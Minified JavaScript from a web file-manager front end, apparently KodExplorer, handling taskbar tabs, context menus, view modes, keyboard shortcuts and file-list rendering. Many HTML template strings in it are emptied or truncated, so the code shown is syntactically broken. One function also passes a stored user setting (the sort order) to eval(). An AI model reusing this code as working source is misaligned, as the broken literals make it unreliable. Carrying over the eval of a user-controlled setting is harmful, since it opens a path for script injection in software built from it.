a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"quit-others":$.each($.dialog.list,function(e,t){a!=e&&t.close()});break;case"quit":i.close()}}})},k=function(){$.contextMenu({zIndex:9999,selector:".task-tab",items:{"close-all":{name:LNG.dialog_close_all,icon:"remove-circle",accesskey:"q"},"show-all":{name:LNG.dialog_display_all,icon:"th-large",accesskey:"s"},"hide-all":{name:LNG.dialog_min_all,icon:"remove",accesskey:"h"}},callback:function(e,t){var a=t.$trigger.attr("id");switch($.dialog.list[a],e){case"show-all":$.each($.dialog.list,function(e,t){t.display(!0)});break;case"hide-all":$.each($.dialog.list,function(e,t){t.display(!1)});break;case"close-all":$.each($.dialog.list,function(e,t){t.close()});break;default:}}})},x=function(e){switch(e){case"open":ui.tree.open();break;case"refresh":ui.tree.refresh();break;case"info":ui.tree.info();break;case"explorer":ui.tree.explorer();break;case"open-project":ui.tree.openProject();break;case"show-file":ui.tree.showFile();break;case"download":ui.tree.download();break;case"search":ui.tree.search();break;case"refresh-all":ui.tree.init();break;case"quit":break;default:}};return{initExplorer:r,initEditor:l}}),define("app/common/taskTap",[],function(){var e={},t="",a=160,i=function(){$(".task-tab .tab").die("mouseenter").live("mouseenter",function(){$(this).hasClass("this")||$(this).addClass("hover")}).die("mouseleave").live("mouseleave",function(){$(this).removeClass("hover")})},n=function(e){var t=e.attr("id"),a=$.dialog.list[t];if(void 0==a)return c(t),void 0;var i=$("."+t);"hidden"==i.css("visibility")?a.display(!0).zIndex():i.hasClass("aui-state-focus")?a.display(!1):a.zIndex()},o=function(){var e,t,i,o,s=!1,r=!1,l=0,c=0,d=0,p=0,u=0,f=0;$(".task-tab .tab").die("mousedown").live("mousedown",function(t){1==t.which&&(e=$(this),h(t),this.setCapture&&this.setCapture(),$(document).mousemove(function(e){m(e)}),$(document).one("mouseup",function(t){g(),this.releaseCapture&&this.releaseCapture(),10>Math.abs(t.pageX-l)&&n(e)}))});var h=function(a){s=!0,r=!0,l=a.pageX,$tab_parent=$(".task-tab"),t=$(".task-tab .tab"),$(".tasktab-dragging").remove(),i=e.clone().addClass("tasktab-dragging").prependTo("body"),p=$sizeInt(t.css("margin-right")),u=$tab_parent.width(),f=$tab_parent.get(0).getBoundingClientRect().left,f+=$(window).scrollLeft(),c=e.get(0).getBoundingClientRect().left,d=$sizeInt(t.css("width")); +var n=e.get(0).getBoundingClientRect().top-$sizeInt(e.css("margin-top")),o=a.clientX-l+c;$("body").prepend("
      "),i.css({width:d+"px",top:n,left:o}),e.css("opacity",0)},m=function(a){if(r){window.getSelection?window.getSelection().removeAllRanges():document.selection.empty(),0==s&&h(a);var n=a.clientX-l+c;f>n||n>f+u-d||(i.css("left",n),t.each(function(){var t=$(this).get(0).getBoundingClientRect().left;if(n>t&&t+d/2+p>n){if(e.attr("id")==$(this).attr("id"))return;v($(this).attr("id"),"left")}if(n>t-d/2+p&&t>n){if(e.attr("id")==$(this).attr("id"))return;v($(this).attr("id"),"right")}}))}},v=function(i,n){if(!e.is(":animated")||o!=i){o=i,e.stop(!0,!0),$(".insertTemp").remove(),t=$(".task-tab .tab");var s=e.width(),r=$(".task-tab #"+i),l=e.clone(!0).insertAfter(e).css({"margin-right":"0px",border:"none"}).addClass("insertTemp");"left"==n?e.after(r).css("width","0px"):(e.before(r).css("width","0px"),r.before(l)),e.animate({width:s+"px"},a),l.animate({width:"0px"},a,function(){$(this).remove(),t=$(".task-tab .tab")})}},g=function(){r=!1,s=!1,startTime=0,$(".dragMaskView").remove(),void 0!=i&&(c=e.get(0).getBoundingClientRect().left,i.animate({left:c+"px"},a,function(){e.css("opacity",1),$(this).remove()}))}},s=function(e){var t=110,i=t,n=t+12,o=$(".task-tab .tab"),s=$(".task-tab .tabs").width()-10,r=o.length,l=Math.floor(s/n);switch(r>l&&(i=Math.floor(s/r)-12),e){case"add":$(".task-tab .tabs .this").css("width","0").animate({width:i+"px"},a);case"close":o.animate({width:i+"px"},a);break;case"resize":o.css("width",i+"px");break;default:}},r=function(t,a){$(".task-tab").removeClass("hidden");var i=a.replace(/<[^>]+>/g,""),n='";$(n).insertBefore(".task-tab .last"),s("add"),e[t]={id:t,name:name}},l=function(e){$(".task-tab .this").removeClass("this"),$(".task-tab #"+e).addClass("this"),t=e},c=function(t){$(".task-tab #"+t).animate({width:0},a,function(){if($(".task-tab #"+t).remove(),s("close"),0==$(".tabs .tab").length&&!core.isApp("desktop")){var e=31;$(".task-tab").animate({bottom:"-"+e+"px"},200,0,function(){$(this).css({bottom:"0px"}).addClass("hidden")})}}),delete e[t]},d=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-taskbar",items:{"quit-others":{name:LNG.close_others,className:"quit-others",icon:"remove-circle",accesskey:"o"},quit:{name:LNG.close,className:"quit",icon:"remove",accesskey:"q"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"quit-others":$.each($.dialog.list,function(e,t){a!=e&&t.close()});break;case"quit":i.close()}}})},p=function(){$.contextMenu({zIndex:9999,selector:".task-tab",items:{closeAll:{name:LNG.dialog_close_all,icon:"remove-circle",accesskey:"q"},showAll:{name:LNG.dialog_display_all,icon:"th-large",accesskey:"s"},hideAll:{name:LNG.dialog_min_all,icon:"remove",accesskey:"h"}},callback:function(e,t){var a=t.$trigger.attr("id");switch($.dialog.list[a],e){case"showAll":$.each($.dialog.list,function(e,t){t.display(!0)});break;case"hideAll":$.each($.dialog.list,function(e,t){t.display(!1)});break;case"closeAll":$.each($.dialog.list,function(e,t){t.close()});break;default:}}})};return{add:r,focus:l,close:c,init:function(){var e='
      ';$(e).appendTo("body"),core.isApp("desktop")||$(".task-tab").addClass("hidden"),$(window).bind("resize",function(){s("resize")}),i(),d(),p(),o()}}}),define("app/src/explorer/ui",["./fileContent"],function(e){var t=e("./fileContent"),a=t.f5,i=t.f5Callback,n=function(e){G.userConfig.listType=e,LocalData.set("listType",e),$(".set-icon-size").hide(),$(".tools-right button").removeClass("active"),$("[data-action=set-"+e+"]").addClass("active"),$("#list-type-header,.line-split-box").addClass("hidden"),$(".set-file-icon-size").hide(),$(Config.FileBoxSelector).removeClass("file-list-icon file-list-list file-list-split"),"list"==e?($(Config.FileBoxSelector).addClass("file-list-list"),$("#list-type-header").removeClass("hidden"),ui.fileListResize.bindHeaderResize()):"icon"==e?($(Config.FileBoxSelector).addClass("file-list-icon"),$(".set-icon-size").show(),$(".set-file-icon-size").show()):"split"==e&&($(Config.FileBoxSelector).addClass("file-list-split"),$(".line-split-box").removeClass("hidden")),$(".menu-set-icon").removeClass("selected"),$(".set-"+e).addClass("selected"),$(".file-continerMore").css("top",0);var t=$(".frame-right-main .tools").outerHeight();"list"==e&&(t+=26),$(".frame-header").is(":visible")&&(t+=$(".frame-header").outerHeight()),$(".bodymain").css("top",t)},o=function(e){n(e),a(!1,!1),void 0===G.sid&&$.get(G.appHost+"setting/set&k=listType&v="+e)},s=function(e,t){0!=e?(G.userConfig.listSortField=e,$(".menu-set-sort").removeClass("selected"),$(".set-sort-"+e).addClass("selected")):e=G.userConfig.listSortField,0!=t?(G.userConfig.listSortOrder=t,$(".menu-set-desc").removeClass("selected"),$(".set-sort-"+t).addClass("selected")):t=G.userConfig.listSortOrder,LocalData.set("listSortField",e),LocalData.set("listSortOrder",t),a(!1,!0),$.ajax({url:G.appHost+"setting/set&k=listSortField,listSortOrder&v="+e+","+t})},r=function(){$(".menu-recycle-button").bind("mouseenter",function(){$(this).addClass("recycle-hover")}).bind("mouseleave",function(){$(this).removeClass("recycle-hover")}).bind("click",function(){ui.path.list(G.KOD_USER_RECYCLE)}),$(".menuShareButton").bind("mouseenter",function(){$(this).addClass("share-hover")}).bind("mouseleave",function(){$(this).removeClass("share-hover")}).bind("click",function(){ui.path.list(G.KOD_USER_SHARE+":"+G.userID+"/")})},l=function(){$("#main-title div").die("click").live("click",function(){$(this).hasClass("resize")||("up"==$(this).attr("id")?$(this).attr("id","down"):$(this).attr("id","up"),s($(this).attr("field"),$(this).attr("id")))})},c=function(){$(".tools a,.tools button").bind("click",function(){var e=$(this).attr("data-action");m(e)})},d=function(){$(".dropdown-menu-theme li").click(function(){var e=$(this).attr("theme");ui.setTheme(e),$.ajax({url:G.appHost+"setting/set&k=theme&v="+e,dataType:"json",success:function(e){if(!e.code){var t=LNG.config_save_error_file;core.authCheck("setting.set")||(t=LNG.config_save_error_auth),Tips.tips(t,!1)}}})})},p=function(){$(".dialog-goto-path").bind("click",function(){var e=G.jsonData.info.adminRealPath;ui.path.list(e)}),$(".toolbar-path-more").die("click").live("click",function(){if($(this).hasClass("active"))return $(".menu-tool-path").trigger("contextmenu:hide"),$(this).removeClass("active"),void 0;$(this).addClass("active");var e=$(this).offset();$(this).contextMenu({x:e.left-4,y:e.top+$(this).outerHeight()-1})}),$(".tool-path-newfile,.tool-path-upload").die("click").live("click",function(){var e=$(this).offset();$(this).contextMenu({x:e.left-4,y:e.top+$(this).outerHeight()-1})}),$("body").bind("click",function(){$(".toolbar-path-more").removeClass("active"),$(".menu-tool-path").trigger("contextmenu:hide")})},u=function(){if("icon"!=G.userConfig.listType)return 1;var e=$(Config.FileBoxSelector).width(),t=$(Config.FileBoxClass).outerWidth()+$sizeInt($(Config.FileBoxClass).css("margin-right"));return parseInt(e/t)},f=function(){var e=u(),t=$(Config.BodyContent).outerHeight(),a=$(Config.FileBoxClass).outerHeight()+$sizeInt($(Config.FileBoxClass).css("margin-bottom"));return Math.ceil(t/a)*e},h=function(){var e=$(Config.FileBoxSelector).outerHeight()-48,t=$(Config.FileBoxClass).outerHeight()+10;return parseInt(e/t)},m=function(e){switch(e){case"recycle-clear":ui.path.recycleClear();break;case"refresh":ui.f5();break;case"newfolder":ui.path.newFolder();break;case"upload":core.upload();break;case"select-all":ui.fileSelect.selectPos("all");break;case"download":ui.path.download();break;case"set-icon":o("icon");break;case"set-list":o("list");break;case"set-split":o("split");break;default:}},v=function(){var e,t=0,a="",i=300;Mousetrap.bind(["1","2","3","4","5","6","7","8","9","0","`","~","!","@","#","$","%","^","&","*","(",")","-","_","=","+","[","{","]","}","|","/","?",".",">",",","<","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"],function(n){var o=String.fromCharCode(n.charCode);return 0==t?(t=timeFloat(),a=o,Tips.pop(a),e=setTimeout(function(){ui.path.setSelectByChar(a),t=0},i),void 0):(i>timeFloat()-t&&(t=timeFloat(),a+=o,clearTimeout(e),Tips.pop(a),e=setTimeout(function(){ui.path.setSelectByChar(a),t=0},i)),void 0)})},g=function(){v(),Mousetrap.bind(["f1","alt+left","backspace","alt+right","ctrl+backspace","command+backspace","ctrl+shift+r","f5","left","up","right","down","home","end","shift+left","shift+up","shift+right","shift+down","shift+home","shift+end","pageup","pagedown","ctrl+a","command+a","ctrl+shift+n","ctrl+shift+f","del","shift+del","f2","ctrl+enter","command+enter","shift+enter","space","enter","ctrl+u","command+u","ctrl+c","command+c","ctrl+x","command+x","ctrl+v","command+v","ctrl+f","command+f","f3","ctrl+i","alt+i","alt+n","alt+m","alt+enter","ctrl+s","command+s","alt+f4"],function(e,t){if($("body").hasClass("stop_hot_key"))return!0;if(ui.isEdit())return!0;if($.contextMenu.isDisplay())return!0;if($(".dialog-path-remove").length>0)return!0;var a=["ctrl+c","command+c","ctrl+v","command+v","ctrl+x","command+x"];switch(inArray(a,t)||stopPP(e),t){case"f1":core.setting("help");break;case"alt+left":case"backspace":ui.path.history.back();break;case"alt+right":case"ctrl+backspace":case"command+backspace":ui.path.history.next();break;case"ctrl+shift+r":case"f5":ui.f5(!0,!0);break;case"left":case"up":case"right":case"down":case"home":case"end":case"shift+left":case"shift+up":case"shift+right":case"shift+down":case"shift+home":case"pageup":case"pagedown":case"shift+end":ui.fileSelect.selectPos(t);break;case"ctrl+a":case"command+a":ui.fileSelect.selectPos("all");break;case"ctrl+shift+n":ui.path.newFolder();break;case"ctrl+shift+f":ui.path.newFile();break;case"del":ui.path.remove();break;case"shift+del":ui.path.remove(!1,!0);break;case"f2":case"ctrl+enter":case"command+enter":ui.path.rname();break;case"shift+enter":ui.path.download();break;case"space":ui.path.open();break;case"enter":ui.path.open();break;case"ctrl+u":case"command+u":core.upload();break;case"ctrl+e":case"ctrl+c":case"command+c":ui.path.copy();break;case"ctrl+x":case"command+x":ui.path.cute();break;case"ctrl+v":case"command+v":ui.path.past();break;case"f3":case"ctrl+f":case"command+f":ui.path.search($(".header-right input").val(),G.thisPath);break;case"alt+enter":case"ctrl+i":case"alt+i":ui.path.info();break;case"alt+n":ui.path.newFile();break;case"alt+m":ui.path.newFolder();break;case"ctrl+s":case"command+s":ShareData.frameTop("OpenopenEditor",function(e){e.Editor.save()});break;default:}})},b=function(){if(core.isApp("desktop")){var e=20,t=20,a=parseInt($(".file").css("height")),i=a-30,n=10,o=15,s=$(document).height()-80,r=Math.floor((s-e)/(a+n)),l=0,c=0,d=0,p=0,u=(s-e-r*(a+n)-n)/r;u>0&&(n+=u),$(".file-continer .file").css("position","absolute"),$(".file-continer .file").each(function(s){l=s%r,c=Math.floor(s/r),d=t+(i+o)*c,p=e+(a+n)*l,$(this).css({left:d,top:p})})}};return{f5:a,f5Callback:i,fileContent:t,initListType:n,setListSort:s,setListType:o,getRowfileNumber:u,getPagefileNumber:f,getColfileNumberDesktop:h,resetDesktopIcon:b,setTheme:function(e){G.userConfig.theme=e,core.setSkin(e),ShareData.frameTop("OpenopenEditor",function(t){t.Editor.setTheme(e)}),ShareData.frameTop("Opensetting_mode",function(t){t.Setting.setThemeSelf(e)}),ShareData.frameTop("",function(t){t.ui.setTheme(e)}),$(".dropdown-menu-theme .list").removeClass("this"),$('.dropdown-menu-theme .list[theme="'+e+'"]').addClass("this")},setWall:function(e,t){$(".background").attr("src",e).one("load",function(){$(".full-background").css("background-image","url("+e+")"),"function"==typeof t&&t()})},setFileIconSize:function(e){ui.fileListResize.setFileIconSize(e,!0),core.isApp("desktop")&&ui.f5()},isEdit:function(){var e=$(document.activeElement).get(0);if(e)return e=e.tagName,"INPUT"==e||"TEXTAREA"==e?!0:$(".file.file-icon-edit").length>0?!0:!1},init:function(){if(G.sid){LocalData.get("theme")&&(G.userConfig.theme=LocalData.get("theme")),LocalData.get("listType")&&(G.userConfig.listType=LocalData.get("listType")),LocalData.get("listSortField")&&(G.userConfig.listSortField=LocalData.get("listSortField")),LocalData.get("listSortOrder")&&(G.userConfig.listSortOrder=LocalData.get("listSortOrder")),LocalData.set("theme",G.userConfig.theme),LocalData.set("listType",G.userConfig.listType),LocalData.set("listSortField",G.userConfig.listSortField),LocalData.set("listSortOrder",G.userConfig.listSortOrder);var e=window.location.href.split("#");2==e.length&&(G.thisPath=urlDecode(e[1]))}if(ui.setTheme(G.userConfig.theme),""==G.thisPath){var a=G.userID||G.sid,o=LocalData.get("thisPath:"+a);G.thisPath=o?o:G.myhome}n(G.userConfig.listType),t.init(),b(),ui.path.history.add(G.thisPath),i(function(){b()}),r(),l(),d(),c(),g(),p()}}}),define("app/src/explorer/fileContent",[],function(require,exports){var tpl=require("../../path/tpl/file/list.html"),pageLoadMax=200,ajaxLive=function(){ui.fileLight.init(),core.isApp("desktop")&&ui.resetDesktopIcon(),"split"==G.userConfig.listType&&ui.fileListResize.bindSplitResize(),lazyLoadImage(),iconFlex(),Hook.trigger("explorer.path.ajaxLive")},lazyLoadImage=function(){var e=$(".bodymain");"split"==G.userConfig.listType&&(e=$(".split-box").last().find(".content")),e.find(".lazyload-ready").lazyload({failure_limit:10,threshold:200,placeholder:G.staticPath+"images/common/loading_circle.gif",skip_invisible:!1,effect:"fadeIn",container:e,load:function(){$(this).removeClass("lazyload-ready")}}).on("error",function(){var e=$(this).data("errorReload");e?"1"==e&&($(this).parent().attr("filetype"),$(this).attr("src",G.staticPath+"images/file_icon/icon_file/picture_error.png"),$(this).data("errorReload","2")):($(this).attr("src",$(this).attr("src")+"#"+UUID()),$(this).data("errorReload","1"))})},iconFlex=function(){if(!core.isApp("desktop")&&"icon"==G.userConfig.listType){$(".file-list-icon .flex-empty").remove();for(var e="",t=0;30>t;t++)e+='
      ';$(e).appendTo(".file-list-icon")}},mainDataDefaultApps=function(){template.helper("fileIconMake",fileIconMake);var e=template.compile(tpl),t="";for(var a in desktopApps){var i={LNG:LNG,G:G,list:desktopApps[a],type:"icon-file"};t+=e(i)}return t},mainSetData=function(e){var t=makeHtml(G.jsonData,0,getPageNumber()-1);core.isApp("desktop")&&(t=mainDataDefaultApps()+t),t=htmlListAction(G.jsonData,t,!1),"split"==G.userConfig.listType&&(t='
      '+t+'
      '),e?$(Config.FileBoxSelector).hide().html(t).fadeIn(Config.AnimateTime).css("display",""):$(Config.FileBoxSelector).html(t),"split"==G.userConfig.listType&&$(".split-box").data("jsonData",G.jsonData),ajaxLive()},scrollDelayTimer="",bindScrollLoadMore=function(){var e=$(".bodymain");e.scroll(function(){clearTimeout(scrollDelayTimer),scrollDelayTimer=!1,scrollDelayTimer=setTimeout(function(){0!=e.scrollTop()&&loadMore()},100)}),$(".split-load-more").live("dblclick",function(){$("[data-action=set-list]").click()})},getPageNumber=function(){var e=ui.fileLight.fileListAll().last(),t=$(".bodymain .file-continer-more");if(0==e.length)return pageLoadMax;var a=G.jsonData.folderList.length+G.jsonData.fileList.length;if(t.css("top",0),pageLoadMax>a||"split"==G.userConfig.listType)return pageLoadMax;var e=ui.fileLight.fileListAll().last(),i=e.outerWidth()+$sizeInt(e.css("margin-right"))+3.5,n=parseInt($(".file-continer").width()/i);"icon"!=G.userConfig.listType&&(n=1);var o=e.outerHeight()+$sizeInt(e.css("margin-bottom")),s=Math.ceil($(Config.BodyContent).height()/o),r=Math.ceil(a/n)*o;return t.css("top",r),s*n},resetTotalHeight=function(){var e=".bodymain .file-continer > .file",t=$(e).last(),a=$(".bodymain .file-continer-more");if(0!=t.length){var i=G.jsonData.folderList.length+G.jsonData.fileList.length;if(a.css("top",0),!(pageLoadMax>i||"split"==G.userConfig.listType)){var n=t.outerWidth()+$sizeInt(t.css("margin-right")),o=parseInt($(".file-continer").width()/n);"icon"!=G.userConfig.listType&&(o=1);var s=t.outerHeight()+$sizeInt(t.css("margin-bottom"));Math.ceil($(Config.BodyContent).height()/s);var r=Math.ceil(i/o)*s;a.css("top",r)}}},loadMoreDelayTimer,loadMore=function(){var e=$(".bodymain .file-continer > .file"),t=e.last(),a=e.length-1,i=G.jsonData.folderList.length+G.jsonData.fileList.length;if(!(a>=i-1||"split"==G.userConfig.listType)){var n=$(".bodymain").scrollTop(),o=$(".bodymain").height(),s=$(".bodymain").offset().top;$(".file-continer").offset().top;var r=t.outerHeight()+$sizeInt(t.css("margin-bottom")),l=s+o-r;if(l>t.offset().top){var c=l-t.offset().top,d=getPageNumber(),p=Math.ceil(c/o),u=p*d+a;u>i&&(u=i),u-a>1e3?($(".init-loading").show(),clearTimeout(loadMoreDelayTimer),loadMoreDelayTimer=setTimeout(function(){loadMoreSet(a+1,u),$(".bodymain").scrollTop(n)},300)):loadMoreSet(a+1,u)}}},loadMoreSet=function(e,t){var a=makeHtml(G.jsonData,e,t),i=$(a);i.appendTo(".file-continer"),ui.fileLight.fileListAll($(Config.FileBoxClass)),ui.fileLight.menuAction("clear"),lazyLoadImage(),iconFlex(),$(".init-loading").hide()},fileIconMake=function(e,t,a){var i="icon"!=t;if("folder"==e){var n=Hook.trigger("explorer.list.folderThumb",a.path,a.ext);return"string"==$.type(n)?n:(e=a.ext||e,core.icon(e,i))}var n=Hook.trigger("explorer.list.fileThumb",a.path,a.ext);if("string"==$.type(n))return n;if(inArray(["jpg","jpeg","png","bmp","gif","ico","svg","cur","webp"],a.ext)){var o=G.appHost+"explorer/image&path=";return G.sid&&(o=G.appHost+"share/image&user="+G.user+"&sid="+G.sid+"&path="),"
      "}if("app_link"==a.type){var s=core.icon("folder");0==a.content.search("ui.path.open")?s=core.icon(core.pathExt(a.name.replace(".oexe",""))):0==a.content.search("ui.path.list")&&(s=core.icon(a.icon));var r="
      "+s+"
      ";return r+""}if(a.icon&&"oexe"==a.ext){var l=a.icon;return"string"==$.type(a.icon)&&-1==a.icon.search(G.staticPath)&&"http"!=a.icon.substring(0,4)&&(l=G.staticPath+"images/file_icon/icon_app/"+a.icon),"
      "+core.iconSrc(l)+"
      "}return"
      "+core.icon(a.ext,i)+"
      "},makeHtml=function(e,t,a){template.helper("fileIconMake",fileIconMake);var i=template.compile(tpl),n="",o=[];o="up"==G.userConfig.listSortOrder?e.folderList.concat(e.fileList):e.fileList.concat(e.folderList),(!a||a>=o.length-1)&&(a=o.length-1);for(var s=t;a>=s;s++){var r="folder"==o[s].type?"-folder":"-file",l={LNG:LNG,G:G,list:o[s],index:s,type:G.userConfig.listType+r};n+=i(l)}return n},pathChildrenTree=function(e,t){if("string"==$.type(e))var a=$('.file[data-path="'+pathHashEncode(e)+'"]');else{var a=e;e=ui.fileLight.path(a)}if(1==a.length){var i=a.find(".children-more"),n=a.find(".children-more-cert"),o=$('.children-list[data-path-children="'+pathHashEncode(e)+'"]'),s=23;if(n.toggleClass("cert-open"),o.toggleClass("hidden"),o.hasClass("child-already-init"))return pathListOdd(),void 0;a.addClass("loading-children"),pathGet(e,function(e){a.removeClass("loading-children");var n=makeHtml(e,0,getPageNumber()-1);""!=n&&(n=htmlListAction(e,n,!0)),o.html(n),ajaxLive(),o.addClass("child-already-init");var r=s+parseInt(i.css("padding-left"));o.find(".file .children-more").css("padding-left",r),pathListOdd(),"function"==typeof t&&t(e)})}},htmlListAction=function(e,t,a){if(""==t)return t='
      '+LNG.path_null+"
      ";var i=e.folderList.concat(e.fileList);if(i.length>pageLoadMax){var n=core.pathFather(i[0].path);"list"==G.userConfig.listType&&a?t+='
      '+'
      '+''+'
      '+''+LNG.file_load_all+""+"
      "+"
      ":"split"==G.userConfig.listType&&(t+='
      '+'
      '+'
      '+''+LNG.file_load_all+"(to list)"+"
      "+"
      ")}return t},pathListOdd=function(){var e=0;ui.fileLight.fileListAll().each(function(){0==$(this).parents(".hidden").length&&(0==e%2?$(this).addClass("file2"):$(this).removeClass("file2"),e++)})},pathChildrenSplit=function(e,t){var a=$('.file[data-path="'+pathHashEncode(e)+'"]'),i=$(".file-list-split .split-box[data-path='"+pathHashEncode(e)+"']");if(0==a.length)return"function"==typeof t&&t(),void 0;if(1==i.length)return i.nextAll().remove(),"function"==typeof t&&t(),void 0;var n=a.parent().parent();pathSplitCreate(e,t,n)},pathSplitCreate=function(e,t,a){pathGet(e,function(i){if("notExists"==i.pathReadWrite)return t(i);var n=makeHtml(i,0,getPageNumber()-1);if(n=htmlListAction(i,n,!0),a)if(a.nextAll(".split-box").length>0){var o=a.next(".split-box");o.attr("data-path",pathHashEncode(e)).find(".content").html(n),o.nextAll().remove()}else n='
      '+n+'
      ',$(n).insertAfter(a).data("jsonData",i);else n='
      '+n+'
      ',$(n).appendTo(".file-list-split").data("jsonData",i);ajaxLive(),"function"==typeof t&&t()})},beforeSelectFileArr={},beforeListOpenArr={},beforeListOpen={},beforeListSplitSelect="",beforeScrollerLeft=0,f5Before=function(){if(!("icon"==G.userConfig.listType||beforeListOpenArr.length>0))if(beforeListOpenArr={},beforeListOpen={},"list"==G.userConfig.listType){var e=$(".child-already-init:visible");if(1>e.length)return;e.each(function(){var e=$(this),t=beforeListOpenArr,a=ui.fileLight.path(e,"data-path-children");beforeListOpen[a]=!1;for(var i=[a];0!=e.parents(".children-list").length;)e=e.parents(".children-list"),i.push(ui.fileLight.path(e,"data-path-children"));for(var n=i.length-1;n>=0;n--){var o=i[n];t[o]!==void 0?t=t[o]:t[o]={}}})}else if("split"==G.userConfig.listType){var t=beforeListOpenArr;beforeScrollerLeft=$(".drag-upload-box").scrollLeft(),beforeListSplitSelect=ui.fileLight.path($(".file-list-split .split-box.split-select")),$(".file-continer .split-box").each(function(){var e=ui.fileLight.path($(this));""!=e&&(t[e]={},t=t[e],beforeListOpen[e]=!1)})}},f5After=function(e){return"icon"==G.userConfig.listType||0==Object.keys(beforeListOpenArr).length?(f5AfterReloadFinished(e),void 0):("split"==G.userConfig.listType&&$(".file-list-split .split-box").remove(),f5AfterReload(beforeListOpenArr,e),void 0)},f5AfterReload=function(e,t){$.each(e,function(e,a){var i=pathChildrenTree;"split"==G.userConfig.listType&&(i=pathSplitCreate),i(e,function(){beforeListOpen[e]=!0,0!=Object.keys(a).length?f5AfterReload(a,t):f5AfterReloadFinished(t)})}),f5AfterReloadFinished(t)},f5AfterReloadFinished=function(e){for(var t in beforeListOpen)if(beforeListOpen[t]===!1)return;$(".drag-upload-box").scrollLeft(beforeScrollerLeft),ui.path.setSelectByFilename(beforeSelectFileArr),ui.fileSelect.selectSplit(beforeListSplitSelect),beforeListOpenArr={},beforeListOpen={},beforeSelectFileArr={},beforeListSplitSelect="","function"==typeof e&&e()},f5=function(e,t,a){if(void 0==e&&(e=!0),void 0==t&&(t=!1),jsonDataSortTitle(),f5Before(),beforeSelectFileArr=ui.fileLight.getAllName(),e?pathGet(G.thisPath,function(e){G.jsonData=e,mainSetData(t),pathTypeChange(G.jsonData),loadMore(),resetTotalHeight(),f5After(a),core.isApp("desktop")?checkRecycle():ui.headerAddress.addressSet()},function(){$(Config.FileBoxSelector).html("")}):(G.jsonData=jsonDataSort(G.jsonData),mainSetData(t),pathTypeChange(G.jsonData),loadMore(),resetTotalHeight(),f5After(a)),!core.isApp("desktop")){var i=G.userID||G.sid;LocalData.set("thisPath:"+i,G.thisPath)}},sortBy=function(e,t){var t="down"==t?-1:1;return function(a,i){var a=a[e],i=i[e];return pathTools.strSort(a,i)*t}},jsonDataSort=function(e){e=jsonDatafilter(e);var t=e.folderList,a=e.fileList;return t="size"==G.userConfig.listSortField||"ext"==G.userConfig.listSortField?t.sort(sortBy("name",G.userConfig.listSortOrder)):t.sort(sortBy(G.userConfig.listSortField,G.userConfig.listSortOrder)),a=a.sort(sortBy(G.userConfig.listSortField,G.userConfig.listSortOrder)),e.folderList=t,e.fileList=a,e},pathGet=function(e,t,a){var i=G.appHost+"explorer/pathList&path="+urlEncode(e);G.user&&(i=G.appHost+"share/pathList&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(e)),$.ajax({url:i,dataType:"json",beforeSend:function(){$(".tools-left .msg").stop(!0,!0).fadeIn(200)},success:function(e){if($(".tools-left .msg").fadeOut(300),!e||!e.code)return Tips.tips(e),"function"==typeof a&&a(),!1;var i=jsonDataSort(e.data);"function"==typeof t&&t(i)},error:function(e,t,i){$(".tools-left .msg").fadeOut(300),core.ajaxError(e,t,i),"function"==typeof a&&a()}})},f5Callback=function(e){f5(!0,!1,e)},jsonDatafilter=function(e){if(!e)return e;if(void 0!=e.shareList&&(selfShare=e.shareList),e.filterSuccess===!0)return e;for(var t in e)if("fileList"==t||"folderList"==t)for(var a=0;e[t].length>a;a++){var i=e[t][a];if(i.mtime&&11>=(""+i.mtime).length)if(i.atime=date(LNG.time_type,i.atime),i.ctime=date(LNG.time_type,i.ctime),e.info&&e.info.pathType==G.KOD_USER_SHARE&&-1==trim(e.thisPath,"/").indexOf("/")){var n=parseInt(i.numView);n=isNaN(n)?0:n;var o=parseInt(i.numDownload);o=isNaN(o)?0:o;var s=date("Y/m/d ",i.mtime)+" ";s+=LNG.share_view_num+n+" "+LNG.share_download_num+o,i.mtime=s}else i.mtime=date(LNG.time_type,i.mtime);i.name=htmlEncode(i.name),i.sid&&"file"==i.type&&(i.ext=htmlEncode(core.pathExt(i.path))),pathIsShare(i.path)?i.metaInfo="path-self-share":pathIsFav(i.path)&&(i.metaInfo="tree-fav"),"number"==typeof i.isReadable&&0==i.isReadable?i.mode="["+LNG.not_read+"] "+i.mode:"number"==typeof i.isWriteable&&1==i.isWriteable?i.mode="["+LNG.system_role_write+"] "+i.mode:"number"==typeof i.isReadable&&1==i.isReadable&&(i.mode="["+LNG.only_read+"] "+i.mode),e.info&&e.info.pathType==G.KOD_USER_RECYCLE&&trim(e.thisPath,"/")==G.KOD_USER_RECYCLE&&(i.menuType="menu-recycle-path")}return e.filterSuccess=!0,e},jsonDataSortTitle=function(){var up='',down='';$("#main-title .this").toggleClass("this").attr("id","").find("span").html(""),$("#main-title div[field="+G.userConfig.listSortField+"]").addClass("this").attr("id",G.userConfig.listSortOrder).find("span").html(eval(G.userConfig.listSortOrder))},pathIsShare=function(e){for(var t in G.selfShare)if(core.pathClear(G.selfShare[t].path)==core.pathClear(e))return!0;return!1},pathIsFav=function(e){var t=G.fav_list;for(var a in t)if(core.pathClear(a)==core.pathClear(e))return!0;return!1},checkRecycle=function(){$.ajax({url:G.appHost+"explorer/pathList&type=desktop&path="+G.KOD_USER_RECYCLE,dataType:"json",error:core.ajaxError,success:function(e){if(!e.code)return!1;var t=core.icon("recycle-full");0==e.data.folderList.length&&0==e.data.fileList.length&&(t=core.icon("recycle")),$(".menu-recycle-button .ico").html(t)}})},pathTypeChange=function(e){if(e.info){var t=e.info,a=t.pathType,i=e.pathReadWrite,n="menu-body-main menu-recycle-body menu-share-body",o=$(".drag-upload-box");t.canUpload=!0,(void 0!=i&&"writeable"!=i||a==G.KOD_GROUP_SHARE&&"owner"!=t.role&&1!=G.isRoot||a==G.KOD_USER_SHARE&&"owner"!=t.role&&1!=G.isRoot||a==G.KOD_GROUP_PATH&&"guest"==t.role&&1!=G.isRoot||a==G.KOD_USER_FAV||a==G.KOD_USER_RECYCLE||a==G.KOD_GROUP_ROOT_ALL||a==G.KOD_GROUP_ROOT_SELF)&&(t.canUpload=!1);var 